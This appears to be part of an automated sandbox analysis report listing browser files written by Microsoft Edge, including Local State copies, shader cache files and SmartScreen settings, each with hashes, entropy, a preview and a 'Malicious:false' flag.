                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a6c0.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3c42c.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF47878.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4e338.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_0

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                              Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                              MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                              SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                              SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                              SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_2

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_3

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\index

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):262512
                                                                                                                                                                                                                                                                                              Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:LsNlg0+tl:Ls3g0+tl
                                                                                                                                                                                                                                                                                              MD5:54749AE87A9B41A681AE34687B0FA0EE
                                                                                                                                                                                                                                                                                              SHA1:B49F23B4B119386993B4950AA890F10BCDBF7C9A
                                                                                                                                                                                                                                                                                              SHA-256:5EC043136A9865E697E32E0F6AC7ED548F1ECE1A1FFB8244DE14C52CACDB6345
                                                                                                                                                                                                                                                                                              SHA-512:0EB5DFD1025DD1B87A765658FF040B376C7ACC7FE427FC4D5DB29C9E24E1625EDBE0A30ADED59CEDE484DB044F584D4000DDB8275583CE3EF2703266E41A1CA7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:..........................................&B../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                              MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                              SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                              SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                              SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):35
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                              MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                              SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                              SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                              SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                              MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                              SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                              SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                              SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):130439
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                              MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                              SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                              SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                              SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                              MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                              SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                              SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                              SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):57
